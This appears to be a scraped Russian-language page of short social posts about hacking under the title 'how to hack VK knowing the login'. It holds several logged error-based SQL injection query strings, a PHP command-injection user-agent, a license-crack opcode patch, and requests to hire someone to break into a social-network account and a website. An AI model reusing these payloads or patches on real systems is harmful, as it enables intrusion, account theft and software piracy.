Как взломать ВК зная логин sitepapa.ru
Воркшоп по взлому чего-то чем-то. Народ подоставал ноутбуки, но кувалд пока не вижу.
"Взломали" чей-то сайт в прямом эфире. (админка Joomla по стандартному адресу, admin:admin) Ни стыда ни совести, зал ржал и апплодировал. :)
ВНЕЗАПНО с Крейзом на хак-конфе. Рассказывают про XOR. Вау.
Тут к нам на сайт радио намедни заходил кто-то. Хотел чего-то. Декодированные QUERY_STRING:
?lang=RU and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
?lang=RU and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,database(),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
?page=news and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
?page=news and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,database(),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
Аж, даже, жалко товарища стало. Ведь на странице "о радио" прямым текстом сказано: "В качестве "базы данных" используется просто файловая система." А он мучался, параметры подбирал... :)
Остаётся надеяться, что это был просто тупой бот, нашедший нас в каком-нибудь гугеле. Не могли же "хакiры" настолько измельчать?
ptn.nr2.ru — ЛОЛ
Кто-то залез на мою АТС-ку, работающую на FreePBX distro и принялся майнить коины на ней.
Скорее всего залезли через nrpe (Nagios remote plugin executor). Вот что значит не доконца настроеный фаервол.
О последствиях взлома роутера и подмены DNS-сервера: habrahabr.ru
Можете проверить, есть ли в базе скомпрометированных QIWI-кошельков ваш: sms-area.org
Восстанавливаю доступ к Яндексу. Отправила им фото себя с паспортом, мне в ответ прислали длинное письмо, в т.ч. там есть:
Для установки новых пароля и контрольного вопроса/ответа нажмите на ссылку:
Вот только ссылку они НЕ ПРИЛОЖИЛИ.
xakep.ru — пока гром не грянет, мужик не перекрестится. какая к черту ИБ? =)
habrahabr.ru красиво
Лол, у меня на сайтах в логах куча людей с useragent'ом <?php system("id"); ?>
Смищные люди
Ой, как интересно!
Обращаем Ваше внимание, что платёж, который Вы оспариваете, зачислен на профессиональный счёт. Вы можете подать жалобу владельцу счёта.
Подробнее о том, как подать жалобу, Вы можете узнать здесь:
money.yandex.ru
Если владелец счёта после жалобы откажется возвращать деньги, Вы можете пройти процедуру идентификации, и мы предоставим Вам данные владельца счёта, на который ушли деньги, чтобы Вы могли обратиться в суд.
О том, как пройти идентификацию, можно прочитать на нашем сайте:
money.yandex.ru
Позвонила знакомому оперу. Она говорит, отдел К ещё существует, но как найти их координаты? :(
Сменила доступы к гуглу, ЖЖ, яндексу, майлу. Два последних были сломаны, первый — не знаю. Остальное — потом всё.
В отдел К я по любому сегодня пойду. Нашла ещё один взломанный аккаунт
А при синхронизации гуглоаккаунта у меня могли попереть данные?
насколько надёжен мастер-пароль в файрфоксе? Легко обходится?
Я спокойна. Я совершенн спокойна. Мне просто невыносимо хочется убивать.
Ночью с моего Якошелька вывели все деньги, собранные за вчера на матильду.
Сейчас буду менять пароли во всех системах, но как же я временами ненавижу людей и этот мир вообще...
habrahabr.ru всё так просто... вот только меня ломать не надо, точка открыта.
мозга учусь летать,вот как взломать свой мозг,чтоб искреннее поверить ,что шагнув с возвышеннути я останусь висеть в воздухе,а не упаду вниз
ВНЕЗАПНО!!!!! Взломали мою учётку на одноклассниках. МОЮ, БЛЯТЬ!!! КАК????? Пароли от 8 до 20 символов. Kaspersky Internet Security — всегда обновлённые базы. За семь лет ни одного взлома, ни одного заражения. Это невозможно!
Школьник взломал сайт космического агентства Казахстана за минуту. securitylab.ru
Проект на фри-ланс.ру: free-lance.ru
Распаковать dll (Themida)
1. Распаковать dll
2. Изменить ip адрес (93.190.143.190) на тот который необходим
3. Запаковать обратно
4. Сделать инструкцию как менять впредь
Шикарно! Особенно с бюджетом в 1000 р. и плашкой "Данный бюджет рассчитан на исполнителей низкого класса".
Цимес в том, что полноценно Фемиду (упаковщик/протектор) вскрыли только однажды, старую вторую версию и то — сумасшедшие китайцы. Так что даже распаковать-поменять-запаковать обратно — уже проблема далеко не на тридцатник Евро. А про "инструкцию как менять впредь" вообше речи быть не может без полного курса реверсинга. :)
Неужто WoT был взломан? Администрация так настаивает на смене паролей, даже акцию соответствующую организовали... Что-то здесь не чисто...
Отучил от жадности софтину на AIR'е. Потратил кружку кофе времени. Так и запишем: RSA не помогает, если его применять бездумно.
Голая Скарлет Йохансон.
Неизвестный хакер скачал с iPhone Скарлет Йохансон, её фото в голом виде, которые она, не как звезда Голливуда, имеющая возможность воспользоваться услугами отличного фотографа, а как обычная симпатичная девушка, втихаря, и конечно не для широкого просмотра, делала себе сама на память.
Наивно доверять что то личное, современной технике. iPhone — это чужие глаза, в вашем кармане.
А у меня, благодаря современным технологиям, отличные фото.
sokol-ff.livejournal.com
webcache.googleusercontent.com — на днях ломали харьковский сайтег горсовета на тему евро 2012 ;). Это то, что там было :)
Нашёл новое место, кроме /tmp и /var/tmp, куда заливают эксплоиты и шеллы через дырявые скрипты — /dev/shm ;)
cripo.com.ua — В египте спецслужбы вроде как научились слушать скайп.
Человеку нужна помощь во взломе страницы в социальной сети Одноклассники. Если кто обладает навыками, просьба написать в личку для обсуждения условий.
Сайт MySQL хакнули SQL-инъекцией webplanet.ru
Это, конечно, не такой эпичный ФАИЛ как HBGary, но тоже блять смешно
На хакерском конкурсе взломали MacBook, iPhone и Internet Explorer. 11 марта в канадском Ванкувере завершается пятый ежегодный конкурс Pwn2Own. В этом мероприятии принимают участие профессиональные взломщики операционных систем и браузеров, занимающиеся поиском уязвимостей в популярном программном обеспечении различных производителей. В этом году на конкурсе были успешно взломаны ноутбук MacBook Air и смартфон iPhone 4, а также смартфон BlackBerry и браузер Internet Explorer. В награду хакеры получили денежное вознаграждение, а информация о способе взлома программ была передана разработчикам ПО.
Каждый год организаторы конкурса несколько видоизменяют его программу. Так, в 2011 году было решено сосредоточить усилия хакеров на взломе браузеров. При этом программу конкурса разделили на две группы: участникам предложили взламывать отдельно компьютерные и мобильные браузеры. artsjournal.ru
Жуйк, как взломать 3G модем, чтобы скорость была постоянно высокой?
Вскрытие системы защиты одной популярной софтины с проверкой ключа через сеть свелась к банальной замене:
Old=MOV AL,BYTE PTR SS:[EBP-2]
New=MOV AL,1
Я понимаю, что авторы особо и не заморачивались, но всё равно так нельзя. :(
Сайт касперского взломали и рассылали с него вирусы habrahabr.ru
Через дыру в ПО третьей стороны был вещи взломан официальный американский сайт компании. В течении трех часов пользователей перекидывало на фишинговую страницу, которая выглядела как Проводник WinXP с сообщениями о заражении системы.
От себя. Пока не ясно, был ли это реально взлом нашей стороны, но в целом это удар по репутации. можете глянуть на Хабре, но там концентрация долбоебов зашкаливает, при том, что комментариев пока мало. Рекомендую следить за темой на AM: anti-malware.ru Тут тоже хватает долбоебов, но важнее, что есть сотрудники (не официальные представители!) компании.
(12:13:59 AM) papa_karlo: есть сайт
(12:14:03 AM) papa_karlo: на сайте есть админка
(12:14:28 AM) papa_karlo: они готовы поспорить на 30 штук что нереально их сламать
(12:15:52 AM) papa_karlo: есть таке которые могут ебнуть его в исключительно спортивных целях?все законно как говориться.сработали бы мне 5 штук челу 25
---
.< моя голова